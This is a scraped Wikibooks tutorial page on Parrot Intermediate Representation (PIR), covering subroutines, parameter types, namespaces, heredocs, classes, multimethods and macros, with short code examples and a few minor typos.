HLL using the language NQP and the Parrot Compiler Tools (PCT). This compiler is then converted to PIR, and then to Parrot bytecode. - We write code in the HLL and compile it. The compiler converts the code into a tree-like intermediate representation called PAST, to another representation called POST, and finally to PIR code. From here, the PIR can be interpreted directly, or else it can be further compiled to Parrot bytecode. PIR, therefore, has features that help to enable writing compilers, and it also has features that support the HLLs that are written using those compilers. Similarly to Perl, PIR uses the " #" symbol to start comments. Comments run from the # until the end of the current line. PIR also allows the use of POD documentation in files. We'll talk about POD in more detail later. Subroutines[edit] Subroutines start with the .sub directive, and end with the .end directive. We can return values from a subroutine using the .return directive. Here is a short example of a function that takes no parameters and returns an approximation of π: .sub 'GetPi' $N0 = 3.14159 .return($N0) .end Notice that the subroutine name is written in single quotes. This isn't a requirement, but it's very helpful and should be done whenever possible. We'll discuss the reasons for this below. Subroutine Calls[edit] There are two methods to call a subroutine: Direct and Indirect. In a direct call, we call a specific subroutine by name: $N1 = 'GetPi'() In an indirect call, however, we call a subroutine using a string that contains the name of that subroutine: $S0 = 'GetPi' $N1 = $S0() The problem arises when we start to use named variables (which we will discuss in more detail below). Consider the following snippet where we have a local variable called "GetPi": GetPi = 'MyOtherFunction' $N0 = GetPi() In this snippet here, do we call the function "GetPi" (since we made the call GetPi()) or do we call the function "MyOtherFunction" (since the variable GetPi contains the value 'MyOtherFunction')? The short answer is that we would call the function "MyOtherFunction" because local variable names take precidence over function names in these situations. However, this is a little confusing, isn't it? To avoid this confusion, there are some standards that people use to make this easier: By sticking with this convention, we avoid all possible confusions later on. Subroutine Parameters[edit] Parameters to a subroutine can be declared using the .param directive. Here are some examples: .sub 'MySub' .param int myint .param string mystring .param num mynum .param pmc mypmc In a parameter declaration, the .param directives must be at the top of the function. You may not put comments or other code between the .sub and .param directives. Here is the same example above: Named Parameters[edit] Parameters that are passed in a strict order like we've seen above are called positional arguments. Positional arguments are differentiated from one another by their position in the function call. Putting positional arguments in a different order will produce different effects, or may cause errors. Parrot supports a second type of parameter, a named parameter. Instead of passing parameters by their position in the string, parameters are passed by name and can be in any order. Here's an example: .sub 'MySub' .param int yrs :named("age") .param string call :named("name") $S0 = "Hello " . call $S1 = "You are " . yrs $S1 = $S1 . " years old print $S0 print $S1 .end .sub main :main 'MySub'("age" => 42, "name" => "Bob") .end In the example above, we could have easily reversed the order too: .sub main :main 'MySub'("name" => "Bob", "age" => 42) # Same! .end Named arguments can be a big help because you don't have to worry about the exact order of variables, especially as argument lists get very long. Optional Parameters[edit] Functions may declare optional parameters, which the caller may or may not specify. To do this, we use the :optional and :opt_flag modifiers: .sub 'Foo' .param int bar :optional .param int has_bar :opt_flag In this example, the parameter has_bar will be set to 1 if bar was supplied by the caller, and will be 0 otherwise. Here is some example code that takes two numbers and adds them together. If the second argument is not supplied, the first number is doubled: .sub 'AddTogether' .param num x .param num y :optional .param int has_y :opt_flag if has_y goto ive_got_y y = x ive_got_y: $N0 = x + y .return($N0) .end And we will call this function with 'AddTogether'(1.0, 1.5) #returns 2.5 'AddTogether'(3.0) #returns 6.0 Slurpy Parameters[edit] A subroutine can take any number of arguments, which can be loaded into an array. Parameters which can accept a variable number of input arguments are called :slurpy parameters. Slurpy arguments are loaded into an array PMC, and you can loop over them inside your function if you wish. Here is a short example: .sub 'PrintList' .param list :slurpy print list .end .sub 'PrintOne' .param item print item .end .sub main :main PrintList(1, 2, 3) # Prints "1 2 3" PrintOne(1, 2, 3) # Prints "1" .end Slurpy parameters absorb the remainder of all function arguments. Therefore, slurpy parameters should only be the last argument to a function. Any parameters after a slurpy parameter will never take any values, because all arguments passed for them will get absorbed by the slurpy parameter instead. Flat Argument Arrays[edit] If you have an array PMC that contains data for a function, you can pass in the array PMC. The array itself will become a single parameter which will be loaded into a single array PMC in the function. However, if you use the :flat keyword when calling a function with an array, till will pass each element of the array into a different parameter. Here is an example function: .sub 'ExampleFunction' .param pmc a .param pmc b .param pmc c .param pmc d :slurpy We have an array called x that contains three Integer PMCs: [1, 2, 3]. Here are two examples: Variables[edit] Local Variables[edit] Local variables can be defined using the .local directive, using a similar syntax as is used with parameters: .local int myint .local string mystring .local num mynum .local pmc mypmc In addition to local variables, in PIR you can use the registers for data storage as well. Namespaces[edit] Namespaces are constructs that allow the reuse of function and variable names without causing conflicts with previous incarnations. Namespaces are also used to keep the methods of a class together, without causing naming conflicts with functions of the same names in other namespaces. They are a valuable tool in promoting code reuse and decreasing naming pollution. In PIR, namespaces are specified with the .namespace directive. Namespaces may be nested using a key structure: .namespace ["Foo"] .namespace ["Foo";"Bar"] .namespace ["Foo";"Bar";"Baz"] The root namespace can be specified with an empty pair of brackets: .namespace [] #Right! Enters the root namespace .namespace #WRONG! Brackets are required! Strings[edit] Strings are a fundamental datatype in PIR, and are incredibly flexible. Strings can be specified as quoted literals, or as "Heredoc" literals in the code. Heredocs[edit] Heredoc string literals have become a common tool in modern programming languages to specify very long multi-line string literals. Perl programmers will be familiar with them, but so will most shell programmers and even modern .NET programmers too. Here is how a Heredoc works in PIR: $S0 = << "TAG" This is part of the Heredoc string. Everything between the '<< "TAG"' is treated as a literal string constant. This string ends when the parser finds the end marker. TAG Heredocs allow long multi-line strings to be entered without having to use lots of messy quotes and concatenation operations. Encodings and Charsets[edit] Quoted string literals can be specified to be encoded in a specific characterset or encoding File Includes[edit] You can include an external PIR file into your current file using the .include directive. For example, if we wanted to include the file "MyLibrary.pir" into our current file, we would write: .include "MyLibrary.pir" Notice that the .include directive is a raw text-substitution function. A file of PIR code is not self contained the way you might expect from some other languages. For instance, one problem that occurs relatively commonly among new users is the concept of namespace overflow. Consider two files, A.pir and B.pir: The .namespace directive from file A overflows into file B, which is counter intuitive for most programmers. Classes and Methods[edit] We'll devote a lot of time talking about classes and object-oriented programming later on in this book. However, since we've already talked about namespaces and subroutines a little bit, we can lay some ground work for those later discussions. A class in PIR consists of a namespace for that class, an initializer, a constructor, and a series of methods. A "method" is exactly the same as an ordinary subroutine except for three differences: - It has the :methodflag - It is called using "dot notation": Object.Method() - The object that is used to call the method (on the left side of the dot) is stored in the "self" variable in the method. To create a class, we first need to create a namespace for that class. In the most simple classes, we create the methods. We will talk about initializers and constructors later, but for now we'll stick to a simple class that uses neither of these: .namespace ["MathConstants"] .sub 'GetPi' :method $N0 = 3.14159 .return($N0) .end .sub 'GetE' :method $N0 = 2.71828 .return($N0) .end With this class (which we probably store in "MathConstants.pir" and include into our main file), we can write the following things: .local pmc mathconst mathconst = new 'MathConstants' $N0 = mathconst.'GetPi'() #$N0 contains the value 3.14159 $N1 = mathconst.'GetE'() #$N1 contains the value 2.71828 We'll explain more of the messy details later, but this should be enough to get you started. Control Statements[edit] PIR is a low-level language and so it doesn't support any of the high-level control structures that programmers may be used to. PIR supports two types of control structures: conditional and unconditional branches. Unconditional Branches are handled by the goto instruction. Conditional Branches use the goto command also, but accompany it with an if or unless statement. The jump is only taken if the if-condition is true or the unless-condition is false. HLL Namespace[edit] Each HLL compiler has a namespace that is the same as the name of that HLL. For instance, if we were programming a compiler for Perl, we would create the namespace .namespace ["Perl"]. If we are not writing a compiler, but instead writing a program in pure PIR, we would be in the default namespace .namespace ["Parrot"]. To create a new HLL compiler, we would use the .HLL directive to create the current default HLL namespace: .HLL "mylanguage", "mylanguage_group" Everything that is in the HLL namespace is visible to programs written in that HLL. For example, if we have a PIR function "Foo" that is in the "PHP" namespace, a program written in PHP can call the Foo function as if it were a regular PHP function. This may sound a little bit complicated. Here is a short example: To simplify, we can write simply .namespace (without the brackets) to return to the current HLL namespace. Multimethods[edit] Multimethods are groups of subroutines which share the same name. For instance, the subroutine "Add" might have different behavior depending on whether it is passed a Perl 5 Floating point value, a Parrot BigNum PMC, or a Lisp Ratio. Multiple dispatch subroutines are declared like any other subroutine in PIR, except they also have the :multi flag. When a Multi is invoked, Parrot loads the MultiSub PMC object with the same name, and starts to compare parameters. Whichever subroutine has the best match to the accepted parameter list gets invoked. The "best match" routine is relatively advanced. Parrot uses a Manhattan distance to order subroutines by their closeness to the given list, and then invokes the subroutine at the top of the list. When sorting, Parrot takes into account roles and multiple inheritance. This makes it incredibly powerful and versatile. MultiMethods, MultiSubs, and other key words[edit] The vocabulary on this page might start to get a little bit complicated. Here, we will list a few terms which are used to describe things in Parrot. - Subroutine - A basic block of code with a name and a parameter list. - Method - A basic block of code which belongs to a particular class and can be called on an object of that class. Methods are just subroutines with an extra implicit selfparameter. - Multi Dispatch - Where multiple subroutines have the same name, and Parrot selects the best one to invoke. - Single Dispatch - Where there is only one subroutine with the given name, and Parrot does not need to do any fancy sorting or selecting. - MultiSub - a PMC type that stores a collection of subroutines which can be invoked by name and sorted/searched by Parrot. - MultiMethod - Same as a MultiSub, except it is called as a method instead of a subroutine. PIR Macros and Constants[edit] PIR allows a text-replacement macro functionality, similar in concept (but not in implementation) to those used by C's preprocessor. PIR does not have preprocessor directives that support conditional compilation. Macro Constants[edit] Constant values can be defined with the .macro_const keyword. Here is an example: .macro_const PI 3.14 .sub main :main print .PI #Prints "3.14" .end A .macro_const can be an integer constant, a floating point constant, a string literal, or a register name. Here's another example: .macro_const MyReg S0 .macro_const HelloMessage "hello world!" .sub main :main .MyReg = .HelloMessage print .MyReg .end This allows you to give names to common constants, strings, or registers. Macros[edit] Basic text-substitution macros can be created using the .macro and .endm keywords to mark the start and end of the macro respectively. Here is a quick example: .macro SayHello print "Hello!" .endm .sub main :main .SayHello .SayHello .SayHello .end This example, as should be obvious, prints out the word "Hello!" three times. We can also give our macros parameters, to be included in the text substitution: .macro CircleCircumference(r) $N0 = r * 3.1.4 $N0 = $N0 * 2 print $N0 .endm .sub main :main .CircleCircumference(5) .CircleCircumference(10) .end Macro Local Variables[edit] What if we want to define a temporary variable inside the macro? Here's an idea: .macro PrintSomething .local string something something = "This is a message" print something .endm .sub main :main .PrintSomething .PrintSomething .end After we do the text substitution, we get this: .sub main :main .local string something something = "This is a message" print something .local string something something = "This is a message" print something .end After the substitution, we've declared the variable something twice! Instead of that, we can use the .macro_local declaration to create a variable with a unique name that is local to the macro: .macro PrintSomething .macro_local something something = "This is a message" print something Now, the same function translates to this after the text substitution: .sub main :main .local string main_PrintSomething_something_1 main_PrintSomething_something_1 = "This is a message" print main_PrintSomething_something_1 .local string main_PrintSomething_something_2 main_PrintSomething_something_2 = "This is a message" print main_PrintSomething_something_2 .end Notice how the local variable declarations now are unique? They depend on the name of the parameter, the name of the macro, and other information from the file? This is a reusable approach that doesn't cause any problems. Resources[edit]
https://en.wikibooks.org/wiki/Parrot_Virtual_Machine/Parrot_Intermediate_Representation
CC-MAIN-2020-40
refinedweb
2,976
58.18
nghttp2_session_create_idle_stream¶ Synopsis¶ #include <nghttp2/nghttp2.h> - int nghttp2_session_create_idle_stream(nghttp2_session *session, int32_t stream_id, const nghttp2_priority_spec *pri_spec)¶ Creates idle stream with the given stream_id, and priority pri_spec. The stream creation is done without sending PRIORITY frame, which means that peer does not know about the existence of this idle stream in the local endpoint. RFC 7540 does not disallow the use of creation of idle stream with odd or even stream ID regardless of client or server. So this function can create odd or even stream ID regardless of client or server. But probably it is a bit safer to use the stream ID the local endpoint can initiate (in other words, use odd stream ID for client, and even stream ID for server), to avoid potential collision from peer's instruction. Also we can use nghttp2_session_set_next_stream_id()to avoid to open created idle streams accidentally if we follow this recommendation. If session is initialized as server, and pri_spec->stream_idpoints to the idle stream, the idle stream is created if it does not exist. The created idle stream will depend on root stream (stream 0) with weight 16. Otherwise, if stream denoted by pri_spec->stream_idis not found, we use default priority instead of given pri_spec. That is make stream depend on root stream with weight 16. This function returns 0 if it succeeds, or one of the following negative error codes: nghttp2_error.NGHTTP2_ERR_NOMEM Out of memory. nghttp2_error.NGHTTP2_ERR_INVALID_ARGUMENT Attempted to depend on itself; or stream denoted by stream_id already exists; or stream_id cannot be used to create idle stream (in other words, local endpoint has already opened stream ID greater than or equal to the given stream ID; or stream_id is 0
https://nghttp2.org/documentation/nghttp2_session_create_idle_stream.html
CC-MAIN-2021-25
refinedweb
279
60.35
I'm working on a Haskell binding for AntTweakBar, a light user interface for OpenGL applications (). I have three questions about how to organize it as a Haskell package or packages, Cabal, and darcs. First, since AntTweakBar provides support for handling events from GLUT, GLFW, and SDL, as well as customizable event handling from other sources, would it be best to divide it into four packages -- AntTweakBar (core), AntTweakBar-GLUT, AntTweakBar-GLFW, and AntTweakBar-SDL? A few other "package groups" on Hackage have taken this approach of splitting according to the user interface: for example, grapefruit-ui-gtk, reactive-glut, though not on such a large scale as I am proposing. Advantages of four packages rather than one: -- Fewer build dependencies, for example, for users who want to use just SDL and not have to install GLUT or GLFW. -- If one of the build dependencies is broken (as for example GLFW is just at the moment with the latest OpenGL), users could still build the other AntTweakBar-* packages. Disadvantages: -- More packages to install, for those who want it all. -- I might seem to be grabbing an undue share of the package namespace. And it could get way out of hand if I further split the examples from the library, making AntTweakBar-(base|GLUT|GLFW|SDL)-(lib|examples) = 8 packages! Would that be a problem? -- Possible inconvenience for the developer (see second question). Second question, assuming the four-way split is the best way to package this: my impression is that a directory can have only one cabal package file and one Setup.hs file. (, "Creating a Package") So for example I could not have, in the same directory, AntTweakBar.cabal, AntTweakBar-GLUT.cabal, etc. That means the four packages would each have to have their own directories, and it is sometimes inconvenient to be jumping back and forth between them. Any good way around that? Third question, assuming four separate directories for the four Cabal package files. Putting all four into one darcs repo (i.e., the darcs repo would have one main directory and a subdirectory for each package) seems to make it easier to coordinate development of the related packages -- for example, a single 'darcs rec -a' takes care of recording the related changes in all four subdirectories. Any reason not to do it that way? -- ___ ___ __ _ / _ \ / _ \| | | | Gregory D. Weber, Associate Professor / /_\// / | | | /\ | | Indiana University East / /_\\/ /__| | |/ \| | \____/\_____/\___/\__/ Tel. (765) 973-8420; FAX (765) 973-8550
http://www.haskell.org/pipermail/haskell-cafe/2009-August/064890.html
CC-MAIN-2014-42
refinedweb
417
61.77
This will help you estimate the cost of running a JupyterHub for your purposes. Costs vary along many dimensions, such as the cloud provider used, the location from which you're running machines, and the types of machines you require. Below are the standard prices for a Google Cloud instance running from Oregon. They should give you a general idea of how much your hub will cost. Here's a list of available machine types. For more information see the Google Cloud pricing guide. from z2jh import cost_display, disk, machines machines Next, run this cell to determine your cost. It will display a widget that lets you draw a pattern of typical usage (you can control the amount of time that is shown with the n_days parameter). Play around with different machine configurations to see how this would affect the cost of your deployment. fig = cost_display(n_days=7)
https://nbviewer.jupyter.org/github/jupyterhub/zero-to-jupyterhub-k8s/blob/master/doc/ntbk/draw_function.ipynb
CC-MAIN-2019-43
refinedweb
148
72.16
Interesting discussion that came up on the ALT.NET list. Many people simply say don't do that but they have a time and place and should be weighed like any other architectural or API decision. While I find that many people will misuse this feature to extremes and code will quickly become unmaintainable I can understand the possible benefits of them (especially in the context of LINQ). So my #1 best practice for extension methods? ALL extension methods should be [SIDE EFFECT FREE FUNCTIONS] I wish that the C# compiler would enforce this rule to not let you create an extension method that was not side effect free but unfortunately this is not the case. Extension methods that change state are quite evil. What do you see as best practices? [Advertisement] Most valued one Not to use extension methods at all. This hack can be needed for API designers. But this is no point to have extension methods in regular code. #1 rule: avoid is possible. Use existing OO techniques to extend types if possible. Extension methods == last resort. #2 rule: just like any other code, look for reuse. See if there's an existing standard library of extension methods that solves your problem. One interesting use of extension methods is the one I mention here: forums.microsoft.com/.../ShowPost.aspx. That is, use extension methods to extend enums for purposes such as converting to strings for the UI. However, in the WPF world I would simply use a converter or data template scoped at the application level. It would make more sense for methods unrelated to UI. PS. Change state of what? The extension target object? Or global state? The former I don't see a problem with. The latter makes me shudder. Pingback from Daily Dose of Links - 20071119 « Daily Geek Bits What kinds of side effects are you suggesting to prohibit? Would you consider changing the target a side-effect? Put them in a namespace such that the client has to "opt-in" to the extension methods. The namespace should only contain the extension method classes and any other classes used by the extension methods. For example, don't put your favorite "System.String" extension methods (.ToAlternatingCase) in the "System" namespace, put it in "System.String.Extensions" or something similar. The namespace should be explicit to both the user writing the code and the user reading the code 6 months later exactly what extensions are being brought in simply by looking at the using statements. But the bug question is... why? Extension methods can only hit public properties/metods. So if an extension method changes an object via it's public properties, hows that different than something else that changes an object through it's public properties? A side effect free function is one that does not change the state of the object it is called on ... it can however return me a new object. A great (and silly) example of a side effect free function would be ... DateTime ThirtyDaysFromNow(DateTime Date) { return Date.AddDays(30); } I think that no extension method should ever try to change the state of the object its working on ... if it wants to do such a state transition it should be returning me a new object (leaving my original object in its original state) ... This is a very common pattern in functional programming and the places where extension methods have the most use is in functional situations (linq)... Peter. Welcome to the group of us who hope spec# makes it into 4.0 :) Great post.... my thoughts exactly. I believe that extensions will be grossly over used. Give a man a hammer, everything becomes a nail. Kent I have seen *maybe* 1 use of extension methods that included mutable methods and was actually something that would survive for 10 seconds in a code review ... It was making a fluent interface on objects that did not have one .... personally I think this should be done with a facade (and everything becomes more explicit/controlled) but I can understand the desire to do such things. I have not really seen any valid mutable extension methods .... Since the main use of extension methods is also within what is for all intensive purposes functional code it seems to me a good idea to follow well established functional behaviors. Cheers, G
http://codebetter.com/blogs/gregyoung/archive/2007/11/19/extension-method-best-practices.aspx
crawl-002
refinedweb
726
66.44
Details Description This functionality is already available via Collection#sum(Closure) as shown here: def nums = 1..10 def squaresAndCubesOfEvens = nums.sum{ it % 2 ? [] : [it**2, it**3] } assert squaresAndCubesOfEvens == [4, 8, 16, 64, 36, 216, 64, 512, 100, 1000] however the name sum is not intuitive in all scenarios and sum is not always the most efficient was to concatenate such lists as it directs through the Groovy 'plus' operator to allow custom overriding of 'plus'. The intention is to provide a collectMany "alias" for sum which is more efficient and has naming similar to C#'s Enumerable.SelectMany operator. Issue Links - is duplicated by GROOVY-6443 Add "flatCollect{}" method as a shorthand for collect{}.flatten()
http://jira.codehaus.org/browse/GROOVY-4932?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
CC-MAIN-2014-42
refinedweb
117
53.41
Would somebody please assist me? I have been consistently been doing trial and error with my counter. You see, when the program cannot locate an item (which is typed at the bottom) it displays "Sorry, no such item number exists, please enter another one or 0 to stop." Every time I try to locate the first few items it loops back into the same message, whereas when I type the last item number on the list, it can locate it... And if I type a 0 in when it can't locate the number the total adds up to a really high number. I don't understand why this occurs, but if someone would like to help, I'd be happy. *Please note that arrays or tables CANNOT be used. #include<iostream> #include<iomanip> #include<fstream> using namespace std; int main() { //Declare files ifstream infile; ofstream outfile; //Creat a output text file named "Sales" outfile.open("Sales.txt"); //Declare variables that are entered from user int itemNumber = 0; int quantity = 0; float paid = 0.0; //Formula variables int counter = 0; float totalCost = 0.0; float tax = 0.0; float totalForAll = 0.0; float taxForAll = 0.0; float change = 0.0; //Variables that are received from the text file "Stocks" int partNumber = 0; const int SIZE = 81; char description[SIZE]; float price = 0.0; //Ask user for the item number cout << "Please enter the item number of the product, type 0 to stop "; cout << "inputting numbers \n" << "and print the receipt.\n"; cout << "Item #: "; cin >> itemNumber; while (itemNumber != 0) { //Open the Stock.txt file infile.open("Stock.txt"); //Use a loop to test each part number and see if it is found for(counter = 9; itemNumber != 0; counter--) { //Get partNumber from the file infile >> partNumber; infile >> description; infile >> price; //If it finds a match to the part number if(itemNumber == partNumber) { //Then write them to the output file "Sales" outfile << "Item Number: "; outfile << partNumber << endl; outfile << "Description: "; outfile << description << endl; outfile << "Price of Item: $"; outfile << price << endl; //Show user the description and price cout << endl; cout << description << endl; cout << "Current Price: $" << price << endl; //Quantity, total cost 4 item, and Tax cout << endl; cout << "How many items of that product "; cout << "are there?\n"; cout << "Quantity: "; //Input Quantity cin >> quantity; //Calculate total cost 4 the item totalCost = price * quantity; //Format accordingly cout << fixed << setprecision(2); cout << showpoint; outfile << fixed << setprecision(2); outfile << showpoint; //Write the cost before tax to "Sales" outfile << "Quantity: "; outfile << quantity << endl; outfile << "Total without Tax: $"; outfile << totalCost << endl; //Tax tax = (totalCost * .08); //Write Tax outfile << "Tax: $"; outfile << tax << endl; //Add Tax to the total cost and then write totalCost += tax; outfile << "Total with Tax: $"; outfile << totalCost; outfile << endl << endl << endl; //Ask another item number, set counter = 10 cout << endl << endl; cout << "Enter another item number, or "; cout << "type 0 to finish.\n"; cout << "Item #: "; cin >> itemNumber; counter = 10; infile.close(); infile.open("Stock.txt"); } //End if for testing item number //If it can't locate the item number... if(counter < 1) { cout << endl; cout << "Sorry, no such item number exists, "; cout << "please enter another one or "; cout << "0 to stop.\n"; cout << "Item #: "; cin >> itemNumber; counter = 10; infile.close(); infile.open("Stock.txt"); } //End if totalForAll += totalCost; taxForAll += tax; } //End repeat for testing item number //Close Stocks.txt infile.close(); } //End the first repeat cout << endl << endl << endl; cout << "Total Tax: $" << taxForAll; outfile << "Total Tax: $" << taxForAll; cout << endl << endl; cout << "Total Due: $" << totalForAll << endl; outfile << endl << endl; outfile << "Total Due: $" << totalForAll; outfile << endl; cout << endl; cout << "Amount Paid: $"; cin >> paid; //Write the amount paid outfile << endl; outfile << "Amount Paid: $"; outfile << paid << endl; //Calculate change change = paid - totalForAll; if(change == 0.0 || change > 0.0) { cout << "Change: $" << change << endl; outfile << "Change: $" << change << endl; } //Doesn't display when change is = 0, problem comparing floats? if(change < -1.0) { change = change * -1; //Converts to positive cout << "The customer owes $" << change << "..." << endl; outfile << "The customer owes $" << change << "..." << endl; } outfile << "\nThank you for shopping @ FUNNY STUFF RETAIL INC.\n"; cout << "\nThank you for shopping @ FUNNY STUFF RETAIL INC.\n"; outfile.close(); system("pause"); return 0; } Stock.txt file contents 1234 Stockings 12.39 2865 Pajamas 17.99 4020 Dress 23.00 3640 Sweater 20.50 5109 Shorts 56.99 4930 TV 88.20 6600 ToothBrush 94.55 5020 AluminumPan 16.79 2336 Pencils 4.55
https://www.daniweb.com/programming/software-development/threads/353941/counter-error-in-my-code-can-t-figure-it-out
CC-MAIN-2018-34
refinedweb
722
73.47
Posted 10 Jun 2015 Link to this post Hallo, I'd like to ask you what is wrong in my scenario. I have tab control with more tabs. In every tab si RadDiagram. When i try copy paste in one diagram everyhing is fine. When i copy item from one diagram to another i have some trouble with style selector. In first case(copy and paste in one diagram) input paramter of the SelectStyle method is type MindMapNode(my custom class represents diagram node. it inherit NodeViewModelBase). But when i copy paste from one diagram to another input parameter of SelectStyle method is Shape so my logic of selecting style can't handle it. Could you be so kind and give me some advice how to fix this ? Thank you very much. Greetings Jakub Posted 12 Jun 2015 Link to this post public class ShapeStyleSelector : StyleSelector { public override System.Windows.Style SelectStyle(object item, System.Windows.DependencyObject
http://www.telerik.com/forums/copy-paste-between-diagrams
CC-MAIN-2017-09
refinedweb
157
67.45
< Main Index JST Tools > Support for javax.ws.rs.core.Application subclass annotated with @ApplicationPath is now available, along with support for standard JEE6 override in the web app deployment descriptor. The JAX-RS Tooling will include the @ApplicationPath annotation value in your endpoints' URI Path Template if you provide a JAX-RS Application class as below: @ApplicationPath("/mypath") public class MyApplication extends Application { ... } Or if you define the application's root path for the JAX-RS endpoint in the web application's web.xml in the one of the following manners: <servlet-mapping> <servlet-name>com.acme.MyApplication</servlet-name> <url-pattern>/hello/*</url-pattern> </servlet-mapping> or <servlet-mapping> <servlet-name>javax.ws.rs.core.Application</servlet-name> <url-pattern>/hello/*</url-pattern> </servlet-mapping> As defined in the JAX-RS 1.1 specification, the web.xml approach takes precedence over the annotation-based configuration. Related Jira We recently had an opportunity to add some better shortcuts to get to the Web Service Tester from common access points in the UI. Most importantly to go with our AS7 support, we now have right-click integration with the JAX-RS tooling for RESTful services. Now you can right-click on one of the exposed REST methods implemented by the service and select Run As...->Run on Server. This does a few things: A couple of caveats: In addition, you can now right-click on a WSDL and select Web Services -> Test in JBoss Web Service Tester. This action does two things: Unfortunately you can't quite run it in this state yet. It's a work in progress. I suspect we will implement a solution similar to the JAX-RS tooling integration where you specify the server on which to run the service and we'll figure out the URL dynamically. You'll still need to look at your deployed services in the web console to determine the url to the service you want to test, then add "?WSDL" to the end so the tester can find the WSDL file in the running service. But it works the same as the WTP-provided Web Services Explorer. Whereas before we would only remember the URLs for the services tested in the current session, we now remember much more for each successful test: So now you can step back and forth through recent tests much easier. If you change something from a previous test run, that change is persisted so the next time you come back to that URL, you see your most recent settings.
http://docs.jboss.org/tools/whatsnew/ws/ws-news-1.2.2.Beta1.html
CC-MAIN-2018-22
refinedweb
424
54.32
Same problem here. I'm on Mac. Git is on path.os.path.exists('/usr/local/git/bin/git') returns True. I am also seeing this. As far as I can tell I have the latest version.OSX 10.7.4Sublime Text 2 Build 2181 I get this in the console: import os;os.path.exists('/usr/local/git/bin/git')True When I try and use the sidebar menu to do anything I get the "Git not found on path" error just as the above few posts do. Is there anything else I can provide to help track down the issue? Open file /SideBarGit/sidebar/SideBarGit.py and below line 41, add if object.command[0] == 'git': object.command[0] = '/usr/local/git/bin/git' It needs to be at the same level of indentation as the previous line.. That may works. No idea. Some people have strange paths behaviour I don't have. Good luck. you may need to restart sublime after the change. it would be really awesome if you could double-click on an entry (for example in a git log result) and have sublime text open the corresponding file. Not sure if the api would support that. Also, the F5 update rocks, thanks! One other thing. the liberal git command seems to truncate parameters, so when I use it to do git rm \pathspec --cached what actually gets run is git rm \pathspec, a rather unfortunate (but recoverable) misinterpretation of my intent. git rm \pathspec --cached git rm \pathspec UPDATEActually, I was wrong - it did exactly what I expected it to do Would love to see this feature too!! I do my work in branches exclusively, branched from master. It would be extremely helpful for me if I could do a "git diff master" or "git diff " through this plugin and output the diff into a buffer and navigate within that back and forth between the source code that is shown in the diff. Hi tito, Is the "Difftool" menu option supposed to call an external diff tool ? If so, how do I configure it to work ? Regards,Danny Hi Tito, When entering a commit message, is there a way to select from messages I entered in the past ? Yep, I don't know which one, was requested by a user. IIRC the default git installation provides a difftool, but for some reason, I don't have it installed here. Nope. You may want to use the short log viewer.. first.. Log -> list of changes latest 50 Regards, I installed Kaleidoscope on my Mac and configured my ~/.gitconfig like this : [difftool "Kaleidoscope"] cmd = ksdiff --partial-changeset --relative-path \"$MERGED\" -- \"$LOCAL\" \"$REMOTE\" [diff] tool = Kaleidoscope [difftool] prompt = false [mergetool "Kaleidoscope"] cmd = ksdiff --merge --output \"$MERGED\" --base \"$BASE\" -- \"$LOCAL\" --snapshot \"$REMOTE\" --snapshot trustExitCode = true [mergetool] prompt = false [merge] tool = Kaleidoscope I then restarted SublimeText2. However, choosing "git/Difftool/all changes since the last commit" does nothing. On the other hand, running "git difftool" from the terminal opens up Kaleidoscope showing the difference between 2 files. What could I be missing here ? Never mind. Discovered Sublime is looking for "ksdiff" in the path, which at this time was /usr/bin . So I created a symbolic link called /usr/bin/ksdiff which points to /Applications/Kaleidoscope.app/Contents/Resources/bin/ksdiff . Problem solved. Hi. Is it possible to supress the output to tabs? i currently use Add & Commit & Push a lot throughout the day and everytime two new tabs are opened with the output. this leads to me having to close quite a lot of tabs per day. so it would be nice to have an option to supress the opening of tabs or at least have the output in a single tab and append the content every time. Great plugin otherwise I've same problem is kind of annonying.. I can live with this for a bit, but was really considering to not open a tab when no errors are presented. So be with me, I'll try to add something.. ) I own the Oblivion repo. I'll add it in.
https://forum.sublimetext.com/t/sidebargit/2857/34
CC-MAIN-2017-22
refinedweb
683
66.03
Difference Between @Size, @Length, and @Column(length=value) Last modified: April 30, 2019 1. Overview In this quick tutorial, we'll take a look at JSR-330‘s @Size, Hibernate‘s @Length and JPA @Column‘s length attribute. At first blush, these may seem the same, but they perform different functions. Let's see how. 2. Origins Simply put, all of these annotations are meant to communicate the size of a field. @Size and @Length are similar. We can use either to validate the size of a field. The first is a Java-standard annotation and the second is specific to Hibernate. @Column, though, is a JPA annotation that we use to control DDL statements. Now, let's go through each of them in detail. 3. @Size For validations, we'll use @Size, a bean validation annotation. Let's use the property middleName annotated with @Size to validate its value between the attributes min and max: public class User { // ... @Size(min = 3, max = 15) private String middleName; // ... } Most importantly, @Size makes the bean independent of JPA and its vendors such as Hibernate. As a result, this is more portable than @Length. 4. @Length And as we just stated, @Length is the Hibernate-specific version of @Size. Let's enforce the range for lastName using @Length: @Entity public class User { // ... @Length(min = 3, max = 15) private String lastName; // ... } 5. @Column(length=value) @Column, though, is quite different. We'll use @Column to indicate specific characteristics of the physical database column. Let's use the length attribute of the @Column annotation to specify the string-valued column length: @Entity public class User { @Column(length = 3) private String firstName; // ... } Consequently, the resulting column would be generated as a VARCHAR(3) and trying to insert a longer string would result in an SQL error. Note that we'll use @Column only to specify table column properties as it doesn't provide validations. Of course, we can use @Column together with @Size to specify database column property with bean validation. @Entity public class User { // ... @Column(length = 5) @Size(min = 3, max = 5) private String city; // ... } 6. Conclusion In this write-up, we learned about the differences between the @Size annotation, @Length annotation and @Column‘s length attribute. We examined each separately within the areas of their use. As always, the full source code of the examples is available over on GitHub.
https://www.baeldung.com/jpa-size-length-column-differences
CC-MAIN-2021-10
refinedweb
396
58.58
JBoss.orgCommunity Documentation Version: 3.3.0.GA BIRT plugin You can find more detailed information on the BIRT plugin, its report types and anatomy on the BIRT Homepage. To understand the basic BIRT concepts and to know how to create a basic BIRT report, refer to the Eclipse BIRT Tutorials. What extensions JBoss Tools provides for Eclipse BIRT you'll find out in the next sections. The key feature of JBoss BIRT Integration is the JBoss BIRT Integration Framework, which allows to integrate a BIRT report into Seam/JSF container. The framework API reference is in the JBoss BIRT Integraion Framework API Reference chapter of the guide. This guide also covers functionality of JBoss Tools module which assists in integration with BIRT. The integration plug-in allows you to visually configure Hibernate Data Source (specify a Hibernate configuration or JNDI URL), compose HQL queries with syntax-highlighting, content-assist, formatting as well as other functionalities available in the HQL editor. To enable JBoss Tools integration with BIRT you are intended to have the next: Eclipse with JBoss Tools installed (how to install JBoss Tools on Eclipse, what dependences and versions requirements are needed reed in the JBoss Tools Installation section) BIRT Report Designer (BIRT Report Designer 2.3.2 you can download from Eclipse downloads site) BIRT 